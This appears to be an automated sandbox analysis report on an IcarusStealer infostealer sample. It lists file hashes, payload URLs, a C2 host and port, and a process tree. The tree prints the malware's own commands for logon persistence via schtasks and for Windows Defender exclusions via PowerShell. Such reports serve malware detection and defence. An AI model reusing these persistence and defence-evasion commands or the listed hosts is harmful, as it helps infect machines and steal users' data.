Analysis

  • max time kernel
    17s
  • max time network
    25s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    13/03/2024, 20:43

General

  • Target

    custom1.exe

  • Size

    24.9MB

  • MD5

    4e1c29f0c1af62ddea916c6b80548c76

  • SHA1

    38d9f15356b6a65f4e76ee739867d55b01493793

  • SHA256

    13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882

  • SHA512

    f863e54437a36b53f91057f74bdbfcaed90c93256333afe978be5f7b73b417a74084d3a92afe4b6ceea96fd909997cf22b30612c43d6d0d27c64c0bba7db9c28

  • SSDEEP

    49152:lfRW10dDWeHzJhNF/CBpOqqUe00zCMe8KfFo:lfw1yaeHLNF/22UwCL8yF

Score
10/10

Malware Config

Extracted

Family

icarusstealer

Attributes
  • payload_url

    https://blackhatsec.org/add.jpg

    https://blackhatsec.org/remove.jpg

Signatures

  • IcarusStealer

    Icarus is a modular stealer written in C# First adverts in July 2022.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\custom1.exe
    "C:\Users\Admin\AppData\Local\Temp\custom1.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2028
    • C:\Users\Admin\AppData\Local\Temp\Client.exe
      "C:\Users\Admin\AppData\Local\Temp\Client.exe"
      2⤵
      • Executes dropped EXE
      PID:2824
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit
        3⤵
          PID:796
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'
            4⤵
            • Creates scheduled task(s)
            PID:1504
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp9119.tmp.bat""
          3⤵
            PID:2328
            • C:\Windows\SysWOW64\timeout.exe
              timeout 3
              4⤵
              • Delays execution with timeout.exe
              PID:2912
        • C:\Users\Admin\AppData\Local\Temp\switched.exe
          "C:\Users\Admin\AppData\Local\Temp\switched.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2484
          • C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
            "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2504
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2624
              • C:\Windows\system32\certutil.exe
                certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
                5⤵
                  PID:2636
                • C:\Windows\system32\find.exe
                  find /i /v "md5"
                  5⤵
                    PID:2412
                  • C:\Windows\system32\find.exe
                    find /i /v "certutil"
                    5⤵
                      PID:2356
                • C:\Users\Admin\AppData\Local\Temp\tesetey.exe
                  "C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
                  3⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2364
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sjpfiy2x\sjpfiy2x.cmdline"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2836
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8CE4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC49DDBE970F649C6AF4C81551425ADE.TMP"
                      5⤵
                        PID:2560
                    • C:\Windows\explorer.exe
                      "C:\Windows\explorer.exe"
                      4⤵
                        PID:1624
                        • C:\Windows\system32\ctfmon.exe
                          ctfmon.exe
                          5⤵
                            PID:2200
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
                          4⤵
                            PID:2688
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
                              5⤵
                                PID:1712
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  6⤵
                                    PID:844
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
                                  5⤵
                                    PID:2396
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
                                      6⤵
                                        PID:1544
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe & exit
                                    4⤵
                                      PID:940
                                      • C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
                                        C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
                                        5⤵
                                          PID:1964

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Temp\Client.exe

                                  Filesize

                                  3.8MB

                                  MD5

                                  5a4be456e1db5bfa8af66dbc678a744d

                                  SHA1

                                  bd9790418b84c4d614fa106e35e0808bc4f877e2

                                  SHA256

                                  754eeded6d9bec170a06ef03d4d7a9681507f5fbe0231c9782453c4ce52d6be4

                                  SHA512

                                  1013d122e4f77cf82853442379ae6a065cf3151982cf64588bde6f102f977be7a3172709607d2041c739ae870223f13dda07edb4dcc7816237c40a016d6afa45

                                • C:\Users\Admin\AppData\Local\Temp\Client.exe

                                  Filesize

                                  2.2MB

                                  MD5

                                  b23c1af138c85b2900b39d22c5d3d1e2

                                  SHA1

                                  f790c963deb68c05b32c708401cce4f29f0ee1d5

                                  SHA256

                                  b0c330fb83ad6542fbd3e0ceb8c3de54d509cd6d0100047a4745489fad7c09ae

                                  SHA512

                                  6273c2a6cad0b8017d62dd67f715b60f9e7b4b219abb522c68e56f6bbb23f92c1b0753413ebb6c4267d108410f6f4cb8b1123c91bd1c74ffe41958b90a9f625a

                                • C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe

                                  Filesize

                                  4KB

                                  MD5

                                  38ddff0dccda77ecd3b4c0271ce4c3b7

                                  SHA1

                                  cd44cc2d50958067277fe9e3d16bed27f93b76d2

                                  SHA256

                                  cdb2ddfc8f18f225b683f032064a65d4dbdd0e1c54e074f6f8f0d36b459185bd

                                  SHA512

                                  0bdd9759e0450df3c9c7bfe3e395414371869d205ff8e4ac58a640125985304d85e735c98345e661f36c5b09e46e3973615eb743f50fc8afd24f7db9670a800e

                                • C:\Users\Admin\AppData\Local\Temp\RES8CE4.tmp

                                  Filesize

                                  1KB

                                  MD5

                                  89802474eae58f4805e1e92017c691a0

                                  SHA1

                                  2fe315d14fd867e7c0a3b76dfd543e46013a97fe

                                  SHA256

                                  babf5156ea555223091ef2e81576a048d38d7f597fa9fa19dcb9e0d3b2816807

                                  SHA512

                                  61634f5d0c2c2eb8517cd92d6ab3cd7dc3163ede7493f72e2ba289b8946a1c2d81e07dd085629859730d574c0d15e2ac260ed4ed768f45eae1612c1b9cdeab57

                                • C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

                                  Filesize

                                  2.7MB

                                  MD5

                                  25de402dacafbac9ffbda0d638eaa58f

                                  SHA1

                                  c9060fc30b4f214b15a3840d46628b28ea513213

                                  SHA256

                                  5098afa6d681c8fd5bb2f19e9e5387d58de0a17331a44da36ae374a94408fce1

                                  SHA512

                                  22b41347abc09dabe46c4d719cc74d043e4d1369342cfb130af94d7982050bc1c7caa1bfdf65eb7833ac8f352b101ccc0a8ad18654470173d3031bcfe7183c7c

                                • C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

                                  Filesize

                                  576KB

                                  MD5

                                  6239d11b49526790f4c67e7d269fba3c

                                  SHA1

                                  6f8fad15f6525e354e53a8ac3f32816162992f1f

                                  SHA256

                                  b18ca03fa4584b2c8b802dda4cad6445c855b91ff1d881531fbb36b32a9ca235

                                  SHA512

                                  794209ba6ef2537fea4d4d253f5d430088abe75624168827a9b973732f959d50e149ad6def1ef42b231be498f5587c1282eab7ca9319e0c61868d91f4e88e3fb

                                • C:\Users\Admin\AppData\Local\Temp\switched.exe

                                  Filesize

                                  448KB

                                  MD5

                                  2aeca0e6e1c7856303b32a3d4e75fe05

                                  SHA1

                                  b80e7c939820b84609191aa385aee2b83f853f1b

                                  SHA256

                                  3135383721179f599f1ff8c484f9b81f66aa8caf140c181a5483f022cc9ae2ea

                                  SHA512

                                  f84ec1582f4dace28a7d89645a254b25f43385d095725da661864176e8b4ebabdef772b6adc4c645db7a91d1ad498db923d69cacd8dde4fc9890b26c658496a7

                                • C:\Users\Admin\AppData\Local\Temp\tmp9119.tmp.bat

                                  Filesize

                                  150B

                                  MD5

                                  564a4c7ef5bd63e52fe1e9d13c1fccd4

                                  SHA1

                                  ff0694cdc6d546bc290808cce1795f65dc469677

                                  SHA256

                                  2328383dd61cb8d7fafd8df4cd836f7796227eb454c34d1e4a190cc204934b8c

                                  SHA512

                                  659a6056274de821790bb4551e52eddfc9b56e9fb8a7c59509fe5a6b56f1e4d75f7e6e92be83cb075b6384bf3a0f9380229366a1fc89732d518f40b94ac4d2dc

                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                                  Filesize

                                  7KB

                                  MD5

                                  d656cc7878ea79e2dee6b13dc5fe251f

                                  SHA1

                                  3254384a6b5c97625e8d59e94d3d67c1b4c9f85d

                                  SHA256

                                  423c8040d8fda0d1ad149fd8655b5e3cff1c02ce3fcbfe75b485149e91bc8045

                                  SHA512

                                  479a3be9115322f30e08a744dea57b6691973f12d20a290b4c8b0f9d6533bb38a8a02215d6fd4ae1b9487398de4b5b32da666895deb21f593e74739b7c4427af

                                • C:\Windows\System32\catroot\$SXR\$SXR.exe

                                  Filesize

                                  192KB

                                  MD5

                                  6a72e16fbf2c20fcbdf96e04bb04eb65

                                  SHA1

                                  a12a7e59a84ed5ad3985910f63bf1f70a225659f

                                  SHA256

                                  0b07d4b73fb5a80a1b58320b7ca79ca03e5d857532f7a1aacfa620be8dc51611

                                  SHA512

                                  f60e9a1bfb29a709f76b0b911606057745d9063dc1afb19c8eea436b1fdcaa0dee9a9c018b343e4d9862716b80e8f3ed67431a0914792558589ea71da7de1ed6

                                • \??\c:\Users\Admin\AppData\Local\Temp\CSCC49DDBE970F649C6AF4C81551425ADE.TMP

                                  Filesize

                                  1KB

                                  MD5

                                  8bbf0aca651a891e81c9323a8af372ee

                                  SHA1

                                  c6ff718e14da6eb73d2733b41c0a95df9a23fc45

                                  SHA256

                                  9e6805b532ceb4ee0108f8616675400798da72a930d70a28c8f12529eacea0c2

                                  SHA512

                                  e9c6bfb01f3d68dbd96e31b7f18d78ea574b7e6c622809a2be0459c4f6b9a4abc204ddc4b6f7526dfdfc872ff543beaa3ceeb89c8f7c7b968c6320740bdfdebb

                                • \??\c:\Users\Admin\AppData\Local\Temp\sjpfiy2x\sjpfiy2x.0.cs

                                  Filesize

                                  1KB

                                  MD5

                                  14846c9faaef9299a1bf17730f20e4e6

                                  SHA1

                                  8083da995cfaa0e8e469780e32fcff1747850eb6

                                  SHA256

                                  61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b

                                  SHA512

                                  549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

                                • \??\c:\Users\Admin\AppData\Local\Temp\sjpfiy2x\sjpfiy2x.cmdline

                                  Filesize

                                  450B

                                  MD5

                                  8a206b0dd904fc29da6ec228eedbfab1

                                  SHA1

                                  74fee881ed3bdfa8cecb0ec718def9f0c1abeeeb

                                  SHA256

                                  e07c68414132c904e4dbfe682b6cb3938e9b85befbe0ce322db34f66c0730968

                                  SHA512

                                  a0346b1663ba4645a4e98b130e30603a3b34a725c920f52fd331426aeb59de96b446f2bec70d8176527258add3fc1c8d697e20217ddcd79a17e34acfbf338912

                                • \Users\Admin\AppData\Local\Temp\Client.exe

                                  Filesize

                                  4.4MB

                                  MD5

                                  7d55baf4955955e76e459e5b5ba4c66c

                                  SHA1

                                  cbca2eb498fc9082afa7e9711fed8a1191829e51

                                  SHA256

                                  feb0013b421fd295e0bbd15df094206f7f1c9304537964dea968b1698604bc81

                                  SHA512

                                  e5e6e35d601a4feb5bf611c4212772019d0c5e0de8dd387b710865e8c3bd2d20eeb70f25152c03a00a9882fa0b0305b46d80733647dabde0c41328194d86ed08

                                • \Users\Admin\AppData\Local\Temp\pulse x loader.exe

                                  Filesize

                                  2.9MB

                                  MD5

                                  08c1c7dd7e9201b1e2b24e431c3d9359

                                  SHA1

                                  75dda75f2005e0d6f58bc0f2d7a9b2ec4e342eb1

                                  SHA256

                                  da1a4b2adc0e1650587004e62e233e2797c02b0278742b3b8320bbfe76497ea8

                                  SHA512

                                  42b838eee7625c8ff43b9e05dc52d2044e58abf5d4cfe25f863b0925f78daed93d7c71a18338eea874bed4e93a0d442b61b45ae42ab8b12b95626af94e79b31f

                                • \Users\Admin\AppData\Local\Temp\switched.exe

                                  Filesize

                                  1.2MB

                                  MD5

                                  6e8af98bed9c795f92fc6757cda409ee

                                  SHA1

                                  3ed8f399138a9145ca325249af5cd063494395a7

                                  SHA256

                                  617ca5ecf6909436493c19dea0388d6f11c6a3201b1f32ed7b26a4a7661c217e

                                  SHA512

                                  13fb699c611f4fa2708debb6c1ef8edac6419ce23ad09e0055547bb003a4d74193ad3db707a68b51ea4dd2133a9e0e68fad19a5d5fd5e411f7262db2bf694995

                                • \Users\Admin\AppData\Local\Temp\tesetey.exe

                                  Filesize

                                  494KB

                                  MD5

                                  0f0838bc6642dd6bc603368e50b4aba3

                                  SHA1

                                  932bd4d1c11996bf8ac3ac74a94b266e96d44c36

                                  SHA256

                                  4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9

                                  SHA512

                                  a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860

                                • memory/1964-85-0x000007FEF5620000-0x000007FEF600C000-memory.dmp

                                  Filesize

                                  9.9MB

                                • memory/1964-64-0x0000000000F80000-0x0000000000F88000-memory.dmp

                                  Filesize

                                  32KB

                                • memory/2364-29-0x0000000000CD0000-0x0000000000D52000-memory.dmp

                                  Filesize

                                  520KB

                                • memory/2364-31-0x00000000745B0000-0x0000000074C9E000-memory.dmp

                                  Filesize

                                  6.9MB

                                • memory/2364-33-0x0000000004380000-0x00000000043C0000-memory.dmp

                                  Filesize

                                  256KB

                                • memory/2484-25-0x0000000002E90000-0x00000000032CC000-memory.dmp

                                  Filesize

                                  4.2MB

                                • memory/2504-27-0x000000013F7C0000-0x000000013FBFC000-memory.dmp

                                  Filesize

                                  4.2MB

                                • memory/2504-84-0x000000013F7C0000-0x000000013FBFC000-memory.dmp

                                  Filesize

                                  4.2MB

                                • memory/2688-54-0x0000000000400000-0x0000000000424000-memory.dmp

                                  Filesize

                                  144KB

                                • memory/2688-46-0x0000000000400000-0x0000000000424000-memory.dmp

                                  Filesize

                                  144KB

                                • memory/2688-49-0x0000000000400000-0x0000000000424000-memory.dmp

                                  Filesize

                                  144KB

                                • memory/2688-48-0x0000000000400000-0x0000000000424000-memory.dmp

                                  Filesize

                                  144KB

                                • memory/2688-60-0x0000000000400000-0x0000000000424000-memory.dmp

                                  Filesize

                                  144KB

                                • memory/2688-50-0x0000000000400000-0x0000000000424000-memory.dmp

                                  Filesize

                                  144KB

                                • memory/2688-65-0x00000000008E0000-0x0000000000920000-memory.dmp

                                  Filesize

                                  256KB

                                • memory/2688-52-0x0000000000400000-0x0000000000424000-memory.dmp

                                  Filesize

                                  144KB

                                • memory/2688-63-0x00000000745B0000-0x0000000074C9E000-memory.dmp

                                  Filesize

                                  6.9MB

                                • memory/2688-51-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                                  Filesize

                                  4KB

                                • memory/2824-32-0x00000000052F0000-0x0000000005330000-memory.dmp

                                  Filesize

                                  256KB

                                • memory/2824-75-0x00000000745B0000-0x0000000074C9E000-memory.dmp

                                  Filesize

                                  6.9MB

                                • memory/2824-14-0x00000000745B0000-0x0000000074C9E000-memory.dmp

                                  Filesize

                                  6.9MB

                                • memory/2824-62-0x00000000745B0000-0x0000000074C9E000-memory.dmp

                                  Filesize

                                  6.9MB

                                • memory/2824-9-0x0000000000A30000-0x0000000001070000-memory.dmp

                                  Filesize

                                  6.2MB